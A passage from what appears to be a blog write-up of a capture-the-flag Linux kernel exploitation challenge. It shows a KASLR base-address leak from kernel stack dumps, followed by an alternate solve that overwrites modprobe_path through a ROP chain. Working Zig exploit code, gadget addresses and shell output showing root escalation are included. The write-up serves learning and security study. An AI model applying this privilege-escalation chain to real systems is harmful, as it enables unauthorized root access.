< 00007ffccba8e152 20 FF 1B 80 1A B9 FF FF A7 22 1A A4 FF FF FF FF ........"......
< 00007ffccba8e162 F1 11 23 A4 FF FF FF FF 00 00 00 00 00 00 00 00 ..#.............
< 00007ffccba8e172 00 7D 35 B9 68 99 63 84 58 FF 1B 80 1A B9 FF FF .}5.h.c.X.......
< 00007ffccba8e182 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
< 00007ffccba8e192 00 00 00 00 00 00 00 00 30 FF 1B 80 1A B9 FF FF ........0.......
< 00007ffccba8e1a2 DA 19 2E A4 FF FF FF FF 48 FF 1B 80 1A B9 FF FF ........H.......
< 00007ffccba8e1b2 57 A1 A0 A3 FF FF FF FF 00 00 00 00 00 00 00 00 W...............
< 00007ffccba8e1c2 00 00 00 00 00 00 00 00 8C 00 C0 A3 FF FF FF FF ................
< 00007ffccba8e1d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..............
---
> 00007ffcef2175d2 20 20 60 47 F0 90 FF FF E0 0F 00 00 00 00 00 00 `G............
> 00007ffcef2175e2 00 0E 76 FC EA 35 42 B0 10 DC CA 46 F0 90 FF FF ..v..5B....F....
> 00007ffcef2175f2 68 7E 1C C0 28 A9 FF FF 04 00 00 00 00 00 00 00 h~..(...........
> 00007ffcef217602 00 DC CA 46 F0 90 FF FF F0 7E 1C C0 28 A9 FF FF ...F.....~..(...
> 00007ffcef217612 00 DC CA 46 F0 90 FF FF 80 7E 1C C0 28 A9 FF FF ...F.....~..(...
> 00007ffcef217622 97 45 2E B3 FF FF FF FF 97 45 2E B3 FF FF FF FF .E.......E......
> 00007ffcef217632 00 DC CA 46 F0 90 FF FF 00 00 00 00 00 00 00 00 ...F............
> 00007ffcef217642 D2 75 21 EF FC 7F 00 00 A0 7E 1C C0 28 A9 FF FF .u!......~..(...
> 00007ffcef217652 00 0E 76 FC EA 35 42 B0 5E 01 00 00 00 00 00 00 ..v..5B.^.......
> 00007ffcef217662 00 00 00 00 00 00 00 00 D8 7E 1C C0 28 A9 FF FF .........~..(...
> 00007ffcef217672 AF E5 28 B3 FF FF FF FF 00 DC CA 46 F0 90 FF FF ..(........F....
> 00007ffcef217682 00 DC CA 46 F0 90 FF FF D2 75 21 EF FC 7F 00 00 ...F.....u!.....
> 00007ffcef217692 5E 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ^...............
> 00007ffcef2176a2 20 7F 1C C0 28 A9 FF FF C7 2E 70 B3 FF FF FF FF ...(.....p.....
> 00007ffcef2176b2 B1 59 70 B3 FF FF FF FF 00 00 00 00 00 00 00 00 .Yp.............
> 00007ffcef2176c2 00 0E 76 FC EA 35 42 B0 58 7F 1C C0 28 A9 FF FF ..v..5B.X...(...
> 00007ffcef2176d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00007ffcef2176e2 00 00 00 00 00 00 00 00 30 7F 1C C0 28 A9 FF FF ........0...(...
> 00007ffcef2176f2 3A 14 4C B3 FF FF FF FF 48 7F 1C C0 28 A9 FF FF :.L.....H...(...
> 00007ffcef217702 57 A1 C0 B2 FF FF FF FF 00 00 00 00 00 00 00 00 W...............
> 00007ffcef217712 00 00 00 00 00 00 00 00 8C 00 E0 B2 FF FF FF FF ................
> 00007ffcef217722 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ..............
Notice the values buf[304..304+8] and buf[328..328+8]: across the different runs only the 4th least significant byte differs. Furthermore, this byte is the same for both values in a single run, so it’s very likely that these values are a constant offset from the kernel base. As it turns out, masking out the lower 2 bytes of buf[304..304+8] yields the kernel base address (source: trust me bro)!
Zig
fn leakBaseAddress(fd: std.posix.fd_t) !u64 {
var buf: [304+8]u8 = undefined;
_ = try std.posix.read(fd, &buf);
const ret = std.mem.bytesAsValue(u64, buf[304..]).*;
return (ret >> 16) << 16;
}
We just need to call adjust_offsets with our kernel base address leak, and bob’s our uncle.
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x6071ec017b6ac500
[INFO] Kernel base: 0xffffffffa4200000
[INFO] You won!!
whoami: unknown uid 0
Alternate solve: modprobe_path
This is not an alternative bypass to KASLR, but rather a different attack vector to indirectly achieve priviledge escalation without putzing with commit_creds(prepare_kernel_cred(0)).
Basically, when execve‘ing a binary with magic bytes the kernel doesn’t recognize, eventually the following will get called:
Bash
$modprobe_path -q -- binfmt-$MAGIC
Where $modprobe_path
is the string stored in the modprobe_path
kernel symbol, and $MAGIC
is whatever the magic bytes of the file are.
So if we overwrite modprobe_path
, we can get the kernel to execute a file we control.
Bash
cat /proc/kallsyms | grep -e 'modprobe_path'
ffffffff82061820 D modprobe_path
Bash
ropr --range=0xffffffff81000000-0xffffffff81400dc6 -R '^(pop rdi;|pop rax;|mov \[rdi+.{3,5}\], ...;) ret;' vmlinux
0xffffffff81004d11: pop rax; ret;
0xffffffff8100767c: pop rdi; ret;
0xffffffff81012833: mov [rdi+0x10], r8d; ret;
0xffffffff81012834: mov [rdi+0x10], eax; ret;
Zig
var POP_RDI: u64 = 0xffffffff8100767c;
var POP_RAX: u64 = 0xffffffff81004d11;
var MOV_ADDROF_RDI_PLUS_16_EAX: u64 = 0xffffffff81012834;
var MODPROBE_PATH: u64 = 0xffffffff82061820;
var KPTI_TRAMPOLINE: u64 = 0xffffffff81200f26;
fn ropchain(writer: anytype) !void {
try writer.writeAll(std.mem.asBytes(&[_]u64{
POP_RAX,
std.mem.readInt(u32, "/tmp", .little),
POP_RDI,
MODPROBE_PATH-0x10,
MOV_ADDROF_RDI_PLUS_16_EAX,
POP_RAX,
std.mem.readInt(u32, "/a" ++ &[_]u8{0} ** 2, .little),
POP_RDI,
MODPROBE_PATH-0x10+0x4,
MOV_ADDROF_RDI_PLUS_16_EAX,
KPTI_TRAMPOLINE,
0, // junk
0, // junk
@intFromPtr(&ret2win),
user_cs,
user_rflags,
user_rsp,
user_ss,
}));
}
fn ret2win() !void {
std.debug.print("[INFO] You won!!\n", .{});
const tmpa = try std.fs.cwd().createFile(
"/tmp/a", .{
.read = true,
.mode = 0o777,
},
);
try tmpa.writeAll(
\\#!/bin/sh
\\whoami &> /tmp/its-a-me
\\chmod 777 /tmp/its-a-me
);
tmpa.close();
const unknown = try std.fs.cwd().createFile(
"/tmp/unknown", .{
.read = true,
.mode = 0o777,
},
);
try unknown.writeAll(&[_]u8{0xff}**4);
unknown.close();
}
Bash
whoami
./exploit
# execute bogus file
/tmp/unknown &> /dev/null
cat /tmp/its-a-me
whoami: unknown uid 1000
[INFO] Saved state
[INFO] Canary: 0x0743fe8b3c798800
[INFO] Kernel base: 0xffffffff85800000
[INFO] You won!!
whoami: unknown uid 0
Resources
This was my first time solving a kernel pwn challenge, and I was initially quite lost as how to even approach this challenge. I found the following resources invaluable:
- PAWNYABLE Holstein v1
- Really good resource for learning the basics of kernel pwn and setting up your environment for kernel debugging.
- Other kernel-rop writeups
- The writeups published by Midas and 0x434b were super helpful for learning bypasses to different mitigations and alternative solutions to arrive at privileged code execution.
For those curious, I wrote the exploits and this post using Emacs org-mode. Taking the time to get it setup was a little annoying, but being able to run arbitrary commands in the challenge VM (not to mention compiling an exploit and regenerating the initramfs) with a single keystroke hugely improved my productivity.
Using Zig instead of C was also quite nice because of a (imo) much better standard library and quick compile times.
Even if using C, using zig cc to easily target x86_64-linux-musl
is super convenient.
If you want to program at the edge of your abilities, consider applying to the Recurse Center.